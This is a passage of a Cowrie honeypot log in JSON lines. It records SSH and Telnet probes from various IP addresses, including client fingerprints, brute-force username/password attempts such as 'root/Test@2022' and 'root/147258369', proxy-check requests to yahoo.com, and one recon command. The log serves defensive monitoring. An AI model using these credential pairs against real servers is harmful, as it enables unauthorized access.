.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T22:13:16.644893Z","src_ip":"213.209.150.239","session":"9867220cf884"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:13:16.880640Z","src_ip":"213.209.150.239","session":"9867220cf884"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":9778,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:9778","sensor":"my-vps","timestamp":"2025-08-26T22:13:16.928843Z","session":"9867220cf884"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T22:13:16.976136Z","src_ip":"213.209.150.239","session":"9867220cf884"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":5774,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5774","sensor":"my-vps","timestamp":"2025-08-26T22:13:17.113634Z","session":"9867220cf884"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T22:13:17.161149Z","src_ip":"213.209.150.239","session":"9867220cf884"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:13:17.209040Z","src_ip":"213.209.150.239","session":"9867220cf884"}
{"eventid":"cowrie.session.connect","src_ip":"121.159.132.232","src_port":58272,"dst_ip":"1.2.3.4","dst_port":23,"session":"f772610e6a00","protocol":"telnet","message":"New connection: 121.159.132.232:58272 (1.2.3.4:23) [session: f772610e6a00]","sensor":"my-vps","timestamp":"2025-08-26T22:13:37.758579Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56850,"dst_ip":"1.2.3.4","dst_port":23,"session":"c02979b64c40","protocol":"telnet","message":"New connection: 212.227.125.160:56850 (1.2.3.4:23) [session: c02979b64c40]","sensor":"my-vps","timestamp":"2025-08-26T22:13:41.890338Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53174,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e84c8e1d458","protocol":"ssh","message":"New connection: 212.227.125.160:53174 (1.2.3.4:22) [session: 4e84c8e1d458]","sensor":"my-vps","timestamp":"2025-08-26T22:13:42.003696Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:13:42.447158Z","src_ip":"212.227.125.160","session":"4e84c8e1d458"}
{"eventid":"cowrie.session.closed","duration":0.5597667694091797,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:13:42.450029Z","src_ip":"212.227.125.160","session":"c02979b64c40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32802,"dst_ip":"1.2.3.4","dst_port":22,"session":"f09241fe5fe0","protocol":"ssh","message":"New connection: 212.227.235.229:32802 (1.2.3.4:22) [session: f09241fe5fe0]","sensor":"my-vps","timestamp":"2025-08-26T22:13:44.992430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:13:45.489393Z","src_ip":"212.227.235.229","session":"f09241fe5fe0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:13:45.490151Z","src_ip":"212.227.235.229","session":"f09241fe5fe0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57400,"dst_ip":"1.2.3.4","dst_port":22,"session":"5603ea333226","protocol":"ssh","message":"New connection: 217.72.205.35:57400 (1.2.3.4:22) [session: 5603ea333226]","sensor":"my-vps","timestamp":"2025-08-26T22:13:46.551064Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:13:46.552442Z","src_ip":"217.72.205.35","session":"5603ea333226"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pa$w0rd","message":"login attempt [admin/pa$w0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T22:13:47.637930Z","src_ip":"212.227.235.229","session":"f09241fe5fe0"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:13:50.116145Z","src_ip":"212.227.235.229","session":"f09241fe5fe0"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":59379,"dst_ip":"1.2.3.4","dst_port":22,"session":"19dd7830215a","protocol":"ssh","message":"New connection: 80.94.95.15:59379 (1.2.3.4:22) [session: 19dd7830215a]","sensor":"my-vps","timestamp":"2025-08-26T22:14:06.142785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T22:14:06.143818Z","src_ip":"80.94.95.15","session":"19dd7830215a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T22:14:06.556160Z","src_ip":"80.94.95.15","session":"19dd7830215a"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd","message":"login attempt [todd/todd] failed","sensor":"my-vps","timestamp":"2025-08-26T22:14:07.524020Z","src_ip":"80.94.95.15","session":"19dd7830215a"}
{"eventid":"cowrie.session.closed","duration":30.52041459083557,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:14:08.278907Z","src_ip":"121.159.132.232","session":"f772610e6a00"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd1","message":"login attempt [todd/todd1] failed","sensor":"my-vps","timestamp":"2025-08-26T22:14:08.962523Z","src_ip":"80.94.95.15","session":"19dd7830215a"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd123","message":"login attempt [todd/todd123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:14:10.492414Z","src_ip":"80.94.95.15","session":"19dd7830215a"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd1234","message":"login attempt [todd/todd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T22:14:11.593260Z","src_ip":"80.94.95.15","session":"19dd7830215a"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd12345","message":"login attempt [todd/todd12345] failed","sensor":"my-vps","timestamp":"2025-08-26T22:14:12.711252Z","src_ip":"80.94.95.15","session":"19dd7830215a"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:14:14.462797Z","src_ip":"80.94.95.15","session":"19dd7830215a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48178,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca13c89165cc","protocol":"ssh","message":"New connection: 212.227.235.229:48178 (1.2.3.4:22) [session: ca13c89165cc]","sensor":"my-vps","timestamp":"2025-08-26T22:16:14.500698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:16:15.296973Z","src_ip":"212.227.235.229","session":"ca13c89165cc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:16:15.297966Z","src_ip":"212.227.235.229","session":"ca13c89165cc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Pa$word","message":"login attempt [admin/Pa$word] failed","sensor":"my-vps","timestamp":"2025-08-26T22:16:17.271397Z","src_ip":"212.227.235.229","session":"ca13c89165cc"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:16:18.689030Z","src_ip":"212.227.235.229","session":"ca13c89165cc"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":40870,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f399588b0a0","protocol":"ssh","message":"New connection: 106.12.128.104:40870 (1.2.3.4:22) [session: 0f399588b0a0]","sensor":"my-vps","timestamp":"2025-08-26T22:16:46.278199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:16:46.279172Z","src_ip":"106.12.128.104","session":"0f399588b0a0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:16:47.365582Z","src_ip":"106.12.128.104","session":"0f399588b0a0"}
{"eventid":"cowrie.login.success","username":"root","password":"147258369","message":"login attempt [root/147258369] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:16:47.996318Z","src_ip":"106.12.128.104","session":"0f399588b0a0"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":47238,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fc5effdf960","protocol":"ssh","message":"New connection: 106.12.128.104:47238 (1.2.3.4:22) [session: 6fc5effdf960]","sensor":"my-vps","timestamp":"2025-08-26T22:17:00.404387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:17:00.405371Z","src_ip":"106.12.128.104","session":"6fc5effdf960"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:17:00.603116Z","src_ip":"106.12.128.104","session":"6fc5effdf960"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T22:17:01.437461Z","src_ip":"106.12.128.104","session":"6fc5effdf960"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":32486,"dst_ip":"1.2.3.4","dst_port":22,"session":"774ffef4ca99","protocol":"ssh","message":"New connection: 213.108.243.7:32486 (1.2.3.4:22) [session: 774ffef4ca99]","sensor":"my-vps","timestamp":"2025-08-26T22:17:19.840159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:17:19.841408Z","src_ip":"213.108.243.7","session":"774ffef4ca99"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:17:19.944591Z","src_ip":"213.108.243.7","session":"774ffef4ca99"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E","message":"login attempt [root/!Q2w#E] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:17:20.247960Z","src_ip":"213.108.243.7","session":"774ffef4ca99"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:17:20.521659Z","src_ip":"213.108.243.7","session":"774ffef4ca99"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-26T22:17:20.522407Z","src_ip":"213.108.243.7","session":"774ffef4ca99"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:17:20.624187Z","src_ip":"213.108.243.7","session":"774ffef4ca99"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:17:20.625398Z","src_ip":"213.108.243.7","session":"774ffef4ca99"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":36004,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b4ca72cb6f5","protocol":"ssh","message":"New connection: 93.123.109.189:36004 (1.2.3.4:22) [session: 5b4ca72cb6f5]","sensor":"my-vps","timestamp":"2025-08-26T22:17:54.415199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:17:54.416243Z","src_ip":"93.123.109.189","session":"5b4ca72cb6f5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T22:17:54.435310Z","src_ip":"93.123.109.189","session":"5b4ca72cb6f5"}
{"eventid":"cowrie.login.failed","username":"sol","password":"123","message":"login attempt [sol/123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:17:54.494633Z","src_ip":"93.123.109.189","session":"5b4ca72cb6f5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:17:55.516709Z","src_ip":"93.123.109.189","session":"5b4ca72cb6f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44646,"dst_ip":"1.2.3.4","dst_port":23,"session":"0434aecca026","protocol":"telnet","message":"New connection: 212.227.235.229:44646 (1.2.3.4:23) [session: 0434aecca026]","sensor":"my-vps","timestamp":"2025-08-26T22:18:29.250772Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34220,"dst_ip":"1.2.3.4","dst_port":22,"session":"71a20d4d3e64","protocol":"ssh","message":"New connection: 212.227.235.229:34220 (1.2.3.4:22) [session: 71a20d4d3e64]","sensor":"my-vps","timestamp":"2025-08-26T22:18:43.771305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:18:45.009189Z","src_ip":"212.227.235.229","session":"71a20d4d3e64"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp